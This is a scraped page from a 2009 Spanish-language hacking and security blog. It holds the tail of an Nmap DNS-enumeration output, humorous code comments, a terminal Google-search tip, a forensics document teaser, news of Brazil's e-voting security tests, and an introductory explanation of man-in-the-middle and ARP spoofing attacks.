Host 213-0-41-197.rad.tsai.es (213.0.41.197) not scanned
Host 213-0-41-198.rad.tsai.es (213.0.41.198) not scanned
Host 213-0-41-199.rad.tsai.es (213.0.41.199) not scanned
Host 213-0-41-200.rad.tsai.es (213.0.41.200) not scanned
Host 213-0-41-201.rad.tsai.es (213.0.41.201) not scanned
Host 213-0-41-202.rad.tsai.es (213.0.41.202) not scanned
Host 213-0-41-203.rad.tsai.es (213.0.41.203) not scanned
Host 213-0-41-204.rad.tsai.es (213.0.41.204) not scanned
Host 213-0-41-205.rad.tsai.es (213.0.41.205) not scanned
Host 213-0-41-206.rad.tsai.es (213.0.41.206) not scanned
Host 213.0.41.207 not scanned
Host 213.0.41.208 not scanned
Host 213.0.41.209 not scanned
Host 213.0.41.210 not scanned
Host 213.0.41.211 not scanned
Host 213-0-41-212.rad.tsai.es (213.0.41.212) not scanned
Host 213-0-41-213.rad.tsai.es (213.0.41.213) not scanned
Host 213-0-41-214.rad.tsai.es (213.0.41.214) not scanned
Host 213.0.41.215 not scanned
Host 213-0-41-216.rad.tsai.es (213.0.41.216) not scanned
Host 213.0.41.217 not scanned
Host 213.0.41.218 not scanned
Host 213-0-41-219.rad.tsai.es (213.0.41.219) not scanned
Host 213-0-41-220.rad.tsai.es (213.0.41.220) not scanned
Host 213-0-41-221.rad.tsai.es (213.0.41.221) not scanned
Host 213-0-41-222.rad.tsai.es (213.0.41.222) not scanned
Host 213-0-41-223.rad.tsai.es (213.0.41.223) not scanned
Host 213-0-41-224.rad.tsai.es (213.0.41.224) not scanned
Host 213-0-41-225.rad.tsai.es (213.0.41.225) not scanned
Host 213-0-41-226.rad.tsai.es (213.0.41.226) not scanned
Host 213-0-41-227.rad.tsai.es (213.0.41.227) not scanned
Host 213-0-41-228.rad.tsai.es (213.0.41.228) not scanned
Host 213.0.41.229 not scanned
Host 213-0-41-230.rad.tsai.es (213.0.41.230) not scanned
Host 213-0-41-231.rad.tsai.es (213.0.41.231) not scanned
Host 213-0-41-232.rad.tsai.es (213.0.41.232) not scanned
Host 213-0-41-233.rad.tsai.es (213.0.41.233) not scanned
Host 213-0-41-234.rad.tsai.es (213.0.41.234) not scanned
Host 213-0-41-235.rad.tsai.es (213.0.41.235) not scanned
Host 213-0-41-236.rad.tsai.es (213.0.41.236) not scanned
Host 213.0.41.237 not scanned
Host 213-0-41-238.rad.tsai.es (213.0.41.238) not scanned
Host 213-0-41-239.rad.tsai.es (213.0.41.239) not scanned
Host 213-0-41-240.rad.tsai.es (213.0.41.240) not scanned
Host 213-0-41-241.rad.tsai.es (213.0.41.241) not scanned
Host 213-0-41-242.rad.tsai.es (213.0.41.242) not scanned
Host 213-0-41-243.rad.tsai.es (213.0.41.243) not scanned
Host 213-0-41-244.rad.tsai.es (213.0.41.244) not scanned
Host 213-0-41-245.rad.tsai.es (213.0.41.245) not scanned
Host 213-0-41-246.rad.tsai.es (213.0.41.246) not scanned
Host 213.0.41.247 not scanned
Host 213.0.41.248 not scanned
Host 213.0.41.249 not scanned
Host 213-0-41-250.rad.tsai.es (213.0.41.250) not scanned
Host 213-0-41-251.rad.tsai.es (213.0.41.251) not scanned
Host 213-0-41-252.rad.tsai.es (213.0.41.252) not scanned
Host 213-0-41-253.rad.tsai.es (213.0.41.253) not scanned
Host 213-0-41-254.rad.tsai.es (213.0.41.254) not scanned
Host 213.0.41.255 not scanned
Nmap done: 256 IP addresses (0 hosts up) scanned in 15.426 seconds

Bueno, pues ahí tenemos los resultados! creo que con esto ya hay bastante información sobre enumeración de servidores por medio de DNS.

Fuente: http://n3t-datagrams.net/

21 sept 2009

Comentarios en Códigos Fuentes XD


Me siento ignorado

 // a veces creo que el compilador ignora todos mis comentarios

Sinceridad


 // estoy borracho, lo arreglo después

Un poco de magia


 // Mágico. No tocar. 

Por si no se entiende


return 1; //retorna 1

Dios, ayúdanos

// Cuando escribí esto sólo Dios y yo sabíamos lo que hace.
    // Ahora, sólo Dios sabe.

Aviso



    /*
    * Quizás creas que sabés lo que hace esta porción de código.
    * Creeme, no lo sabés.
    * Si tratás de entenderlo vas a pasar muchos horas sin dormir,
    * maldiciendo el momento que pensaste que eras los suficientemente
    * inteligente para "optimizar" el siguiente código.
    * Así que, cerrá este archivo y andá a jugar con otra cosa.
    */

Advertencia para al mantenedor



    //
    // Querido mantenedor:
    //
    // Una vez que termines de intentar "optimizar" esta rutina,
    // y que te des cuenta del terrible error que cometiste,
    // por favor incrementá el siguiente contador como una
    // advertencia para el próximo:
    //
    // total_de_horas_gastadas_aqui = 16
    //


Desconfiar de la documentación



    /**
    * Siempre devuelve true.
    */
    public boolean isAvailable() {
    return false;
    }

Arreglo



    // no estoy seguro de que esto funcione, pero resuelve el problema


Fuente: http://chilean-coder.blogspot.com/

Buscar en Google desde la consola

Por si alguna vez necesitamos hacer una búsqueda en Google y sólo tenemos la terminal a mano, este tip puede resultarnos bastante útil. Primero nos aseguramos de tener los paquetes curl y html2text disponibles, si no es así los instalamos con este comando:

sudo apt-get install curl html2text

Luego podemos realizar las búsqueda propiamente dicha (cambiando el texto que le sigue a "q=" en este ejemplo):

curl -A Mozilla http://www.google.com/search?q=linux | html2text -width 70

La salida no será para nada atractiva, pero con un poco suerte lo suficientemente legible como para resultar de utilidad hasta que podamos tener un navegador cerca.

Artículo completo en Unixmen.

Fuente: http://www.vivalinux.com.ar/

20 sept 2009

Introducción a la Informática Forense


Este documento no pretende ni tiene la finalidad de convertirse en manual de referencia. Este documento relata los aspectos básicos relacionados en el campo de la informática forense, explicando de una forma simple y concisa las herramientas utilizadas para la captura de evidencias. También explicará los aspectos técnicos relativos a la arquitectura de un sistema Windows. Probablemente esto ayudará al lector a comprender mejor cómo un sistema Windows recopila y almacena la información, ayudando también a entender la arquitectura del sistema.

General:
  • Definición de análisis forense
  • Evidencia Digital
  • RFC3227 (Recolección y manejo de evidencias)
  • Buenas prácticas a la hora de analizar datos
Entorno Microsoft:
  • Cuentas de usuario y perfil de usuario
  • Tipos de Logon en un sistema basado en Windows
  • La Papelera de Reciclaje. Estructura y funcionamiento
  • Archivos de Registro. Estructura
  • Index.dat e Internet Explorer. Estructura y funcionamiento
  • Service Pack, HotFix. Qué es y para qué sirve?
Descarga (Directa)

Fuente: http://www.elhacker.net

Premian por Hackear las urnas electrónicas de Brasil

El Tribunal Superior Electoral (TSE) de Brasil abrió la semana pasada las inscripciones para todos los hackers que quieran hacer el intento descubrir posibles vulnerabilidades en los sistemas de sus urnas electrónicas que serán utilizadas para las elecciones presidenciales del año que viene en ese país. Las inscripciones se realizarán hasta el próximo 13 de Octubre y las siguientes pruebas serán públicas, realizándose entre el 10 y 13 de Noviembre.



Para participar los interesados (llamados “investigadores” por el TSE) deberán presentar su plan de acción describiendo los procedimientos que pretenden seguir y los equipos piensan usar para intentar romper la seguridad de las urnas. Las propuestas aceptadas serán anunciadas en una publicación oficial el 26 de Octubre.

El investigador deberá firmar un acuerdo con el TSE para proporcionarle toda la información sobre los materiales y procedimientos utilizados, hayan tenido éxito o no. El TSE creará luego un sitio especial para publicar los resultados de las pruebas. Las contribuciones más importantes serán premiadas de alguna manera todavía no anunciada.

Fuente: http://www.linux-os.com.ar/

19 sept 2009

Man in the Middle Attacks: Teoría e Introducción

Este va a ser el primero de una serie de posts, que tratarán como tema principal el ataque de tipo Man in the Middle, comúnmente abreviado como MITM, los cuales intentarán transmitir una base teórica del funcionamiento y principios del ataque, para posteriormente centrarnos en más prácticos temas prácticos, así como la defensa ante el MITM.
En cuanto a criptografía, un MITM es una técnica en el cual un atacante puede interceptar mensajes entre dos víctimas, siendo capaz de tener acceso y modificar la información transmitida entre las dos partes, todo esto sin que ninguna tenga conocimiento de éste.
Main_the_middle
Esquema de un ataque MITM, sacado de la página web de la OWASP. En este se ve cómo el atacante recibe la información que intercambian las víctimas (aquí un ordenador de escritorio y un servidor), sin que estas puedan apreciarlo.
  • Eavesdropping (literalmente, escuchar secretamente). Interceptar y acceder activamente a la información transmitida, por ejemplo, mediante un sniffer.
Eavesdropping
Diagrama de un ataque local de eavesdropping, obtenido de la web de la OWASP, en el que se ve cómo una contraseña enviada por la vítcima es interceptada por el atacante.
  • Denegaciones de servicio, es decir, interrumpir el flujo de información entre víctimas, bloqueando la comunicación.
  • Spoofing. Hacerse pasar por una de las víctimas para enviar información, modificarla…
La forma más usual de realizar este ataque, es mediante una técnica conocida como ARP Spoofing, también llamada ARP Poisoning, llevada a cabo en redes locales.

El protocolo ARP

El Adress Resolution Protocol, o protocolo de resolución de direcciones, se encarga de relacionar la dirección física o hardware de una tarjeta de interfaz de red con su dirección IP correspondiente a nivel de red, mediante peticiones ARP. Todo esto funciona mediante una serie de peticiones, que se agilizan gracias a unas tablas caché, llamadas tablas ARP, que guardan direcciones ya traducidas, que cuando pasa un determinado tiempo, se van borrando.
En el contexto del ataque, el ordenador atacante envenena las tablas ARP tanto del router como del equipo víctima, haciendo así que todo el tráfico pase por él, es decir, interceptándolo.

Fuente: http://arrivalsec.wordpress.com/

Labels

0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (7) BlackHat (1) Blackploit (30) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (2) Conference (10) Cryptsetup (1) CSRF (1) DDoS (11) DEF CON (3) DEFCON (7) Dev (1) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Ezine (1) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (135) Hack Tips (63) Hacked (6) Hacking (19) Hacking Hardware (5) HashCat (1) Herramientas (125) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (6) Leaks (22) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (200) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (10) PDF (7) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (11) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (5) Ransomware (1) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (150) Seguridad Web (139) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (74) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Underc0de (1) UnderDOCS (1) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (48) Virtualización (2) Web T00LZ (16) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (65) Wireless Tools (13) XSS (16) Youtube (1)

 
biz.